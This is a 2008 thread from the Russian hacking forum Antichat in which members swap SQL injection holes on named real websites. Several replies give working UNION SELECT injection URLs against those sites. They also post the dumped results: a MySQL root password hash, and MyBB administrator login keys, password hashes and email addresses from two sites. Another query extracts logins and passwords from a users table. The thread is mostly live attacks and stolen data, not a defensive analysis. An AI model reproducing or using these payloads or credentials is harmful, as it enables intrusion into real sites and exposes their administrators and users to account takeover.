HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.08.2008, 10:46
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161

Репутация: 5
По умолчанию

кто поможет
Цитата:
http://evo.nightspirits.net/indexframe.php?razdel=registration'
вот нашёл такую дыру кто скажет можно её дальше раскроить?
 
Ответить с цитированием

  #2  
Старый 09.08.2008, 14:05
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от superboys  
кто поможет

вот нашёл такую дыру кто скажет можно её дальше раскроить?
Код:
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(concat(version(),char(58),user()))),6,7,8,9/*
Кстати там ещё таблица users есть.
 
Ответить с цитированием

  #3  
Старый 10.08.2008, 11:55
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161

Репутация: 5
По умолчанию

Цитата:
Сообщение от Grey  
Код:
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(concat(version(),char(58),user()))),6,7,8,9/*
Кстати там ещё таблица users есть.
можно попонятнее разъяснить где что я нуп))
 
Ответить с цитированием

  #4  
Старый 10.08.2008, 13:49
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от superboys  
можно попонятнее разъяснить где что я нуп))
https://forum.antichat.ru/threadnav43966-1-10.html
 
Ответить с цитированием

  #5  
Старый 10.08.2008, 01:20
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
По умолчанию

Вот мой не похек (((( помогите пожалуйстА!
http://football.kapook.com/webboard_view_guest.php?qid='4595
http://mrdriver.com/device.php?id=33714'
http://driversdb.com/device.php?id=107971'
2 последних..вообще как одинаковые...

Последний раз редактировалось DDoSька; 10.08.2008 в 02:11..
 
Ответить с цитированием

  #6  
Старый 10.08.2008, 01:27
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

K1nD[e]R, mysql.userS не существует. Есть mysql.user
 
Ответить с цитированием

  #7  
Старый 10.08.2008, 05:21
tor4)
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529

Репутация: 41
По умолчанию

DDoSька

http://football.kapook.com/team.php?id=13%27+union+select+1,2,3,4,5,6,7,conca t(0x3a,user,0x3a,password),9,10,11,12,13,14,15,16, 17,18,19,20+from+mysql.user/*
:root:612382396d951d43

http://mrdriver.com/device.php?id=-33714%27+union+select+version()/*
5.0.24-standard
Не будем перебирать все таблицы и посмотрим на сайт.
Стоит форум mybb пробуем табл mybb_users
http://mrdriver.com/device.php?id=-33714%27+union+select+concat(uid,0x3a,loginkey,0x3 a,password,0x3a,email,0x3a,icq)+from+mybb_users+li mit+0,1/*

1:sekysvwGmEE5uCfSHMKdK1uAUdrykTa6XkwLbNSnsxli1Q2D 7h:24a1de6ebae6c9497fac8e1c328d8fa2:webmaster@mrdr iver.com:
Всё зашифровал))) гад.


http://driversdb.com/device.php?id=-107971%27+union+select+concat(uid,0x3a,loginkey,0x 3a,password,0x3a,email,0x3a,icq)+from+mybb_users+l imit+0,1/*

1:7T6Jlse4WHMFWtJax9OsOVgLqmWoufnlzPDkCtHGFleS9YZm W4:e7cf5c7cf184622332e2bc347a38659a:forum@driversd b.com:

Последний раз редактировалось tor4); 10.08.2008 в 05:41..
 
Ответить с цитированием

  #8  
Старый 10.08.2008, 14:15
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161

Репутация: 5
По умолчанию

Да уже всё репку накинул))
 
Ответить с цитированием

  #9  
Старый 10.08.2008, 14:50
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
По умолчанию

Код:
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/*
Помогите новичку дальше незнаю что делать
 
Ответить с цитированием

  #10  
Старый 10.08.2008, 15:59
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
По умолчанию

Цитата:
Сообщение от S0ulVortex  
Код:
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/*
Помогите новичку дальше незнаю что делать
_http://www.safelider.ru/view.php?item=-2877+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,log in,password),9,0+from+users/*


Код HTML:
Table [banners]  Table [catalog]  Table [catalog_picture]  Table [catalog_struct]  Table [catalog_text]  Table [db_pics]  Table [feature_bind]  Table [feature_group]  Table [feature_type]  Table [fotobank]  Table [invoice]  Table [link_catalog]  Table [manufactures]  Table [news]  Table [pages]  Table [pricelist]  Table [tovar]  Table [users]
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.